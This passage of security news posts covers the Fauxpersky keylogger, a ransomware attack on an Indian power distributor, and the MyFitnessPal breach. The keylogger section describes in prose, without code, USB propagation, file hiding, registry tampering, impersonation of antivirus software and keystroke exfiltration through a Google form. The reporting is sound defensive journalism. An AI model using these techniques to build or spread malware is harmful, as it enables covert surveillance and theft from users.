After initial execution, the Fauxpersky keylogger gathers the listed drives on the machine and starts replicating itself to them.

“This AHK keylogger utilizes a fairly straightforward method of self propagation to spread. After the initial execution, the keylogger gathers the listed drives on the machine and begins to replicate itself to them. Let’s examine the process:” reads the analysis.

“This allows the keylogger to spread from a host machine to any connected external drives. If the keylogger is propagating to an external drive, it will rename the drive to match it’s naming scheme.”

The malware renames the external drives to match its naming scheme, the new name is composed of the following convention:

original name:size:”Secured by Kaspersky Internet Security 2017”

it also creates an autorun.inf file to point to a batch script.

One of the dropper files, Explorers.exe, includes a function called CheckRPath() designed creates the files if they are not already present on the drive.

The keylogger created the files with attributes System and Hidden and also creates the necessary directories, with parameters of Read-Only, System, and Hidden.

“When starting the process of creating the component files (HideRFiles()) we begin by starting a loop. This loop allows the keylogger to iterate over the various output files it needs to write to disk in a structured way.” continues the analysis. “We can see that the link (a .lnk shourtcut file), text, and batch files will all be created for each disk to start. Then the value passed to the function gets incremented to allow the created directory to be moved as a whole once the files have been placed there. “

The files are stored in the source directory named Kaspersky Internet Security 2017 when it is copied to the new destination. The folder included a Kaspersky image named Logo.png and a text file containing instructions for users to disable their antivirus if execution fails. The instructions also include a list of security tools “incompatible with Kaspersky Internet Security 2017” (Kaspersky Internet Security included).

Fauxpersky monitors the currently active window using the AHK functions WinGetActiveTitle() and input(), Keystrokes are appended to the file Log.txt that is stored in %APPDATA%\Kaspersky Internet Security 2017.

The malware gains persistence by changing the working directory of the malware to %APPDATA% and creating the Kaspersky Internet Security 2017 folder. It checks that all the necessary files are created in %APPDATA% and copies them there if they aren’t.

The files Spoolsvc.exe is used to change the values of registry keys to prevent the system from displaying hidden files and to hide system files, then it verifies if explorers.exe is running and launches it if not.

Fauxpersky keylogger

Fauxpersky exfiltrates the keylogged data using a Google form.

“Exfiltrating data to a Google form is a very simple and clever way to overcome a lot of the “logistics” involved in data exfiltration. Using this technique means there’s no need to maintain an anonymized command and control server plus data transmissions to docs.google.com is encrypted and doesn’t look suspicious in various traffic monitoring solutions.” Cybereason concluded.

Pierluigi Paganini

(Security Affairs – Fauxpersky keylogger, malware)

The post Fauxpersky Keylogger masqueraded as Kaspersky Antivirus and spreads via USB drives appeared first on Security Affairs.

Systems at a Power Company in India infected by a ransomware

A ransomware infected systems at the Uttar Haryana Bijli Vitran Nigam power company in India, crooks demanded 10 million Rupees to get the data back.

The Uttar Haryana Bijli Vitran Nigam power company in India was hacked last week, attackers breached into its computer systems and stole the billing data of their customers.

The hackers demanded 10 million Rupees to get the data back (roughly $152,000 USD).

cerber ransomware

The intrusion occurred on March 21 night, a ransomware infected the systems and the day after the employees discovered that their data were encrypted.

“In a first of the kind of a case in the country, the hackers have stolen the billing data of the Uttar Haryana Bijli Vitran Nigam (UHBVN), one of the two power discoms of Haryana and have demanded Rs One crore in form of bitcoins from the state government to retrieve the data.” states the New Indian Express.

“Sources said that UHBVN which is monitoring electricity billings of nine districts of the state came under cyber attack at 12.17 AM after midnight on March 21 and thus the billing data of thousands of consumers had been hacked as the IT wing of the nigam was target.”

The Haryana Police launched an investigation trying to trace the IP address from where the attack was originated.

The officials at the company are uploading the billing data from the log books, anyway the incident could have a significant impact on the billing activities due to the difficulties to estimate current consumption in absence of data. The good news is that the billing of about 4,000 consumers has already started functioning normally.

“The Nigam had already taken steps much before to phase out the said system and to be replaced by latest, robust and technologically advanced system on cloud services which would be operational by the end of May 2018. The billing of about 4,000 consumers has already started functioning normally” added an official of the Nigam.

Pierluigi Paganini

(Security Affairs – Power Company, ransomware)

The post Systems at a Power Company in India infected by a ransomware appeared first on Security Affairs.

Under Armour data breach affected about 150 million MyFitnessPal users

Under Armour became aware of a potential security breach on March 25, the company said an unauthorized party had accessed MyFitnessPal user data.

Under Armour learned of the data breach on March 25,  it promptly reported the hack to law enforcement and hired security consultants to investigate the incident.

Attackers hacked the MyFitnessPal application that is used by its customers to track fitness activity and calorie consumption.

MyFitnessPal under armour

According to the firm, an unauthorized party obtained access to user data, including usernames, email addresses, and “hashed” passwords.

The good news is that hackers did not access financial data (i.e. payment card data) or social security numbers and drivers licenses.

“On March 25, the MyFitnessPal team became aware that an unauthorized party acquired data associated with MyFitnessPal user accounts in late February 2018. The company quickly took steps to determine the nature and scope of the issue and to alert the MyFitnessPal community of the incident.” reads a statement issued by the company.

“The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers), which the company does not collect from users. Payment card data was also not affected because it is collected and processed separately. The company’s investigation is ongoing, but indicates that approximately 150 million user accounts were affected by this issue.”

The company notified de data breach by email and in-app messaging to update settings to protect account information.

“The notice contains recommendations for MyFitnessPal users regarding account security steps they can take to help protect their information. The company will be requiring MyFitnessPal users to change their passwords and is urging users to do so immediately.” continues the statement.

Pierluigi Paganini

(Security Affairs – Under Armour, data breach)

The post Under Armour data breach affected about 150 million MyFitnessPal users appeared first on Security Affairs.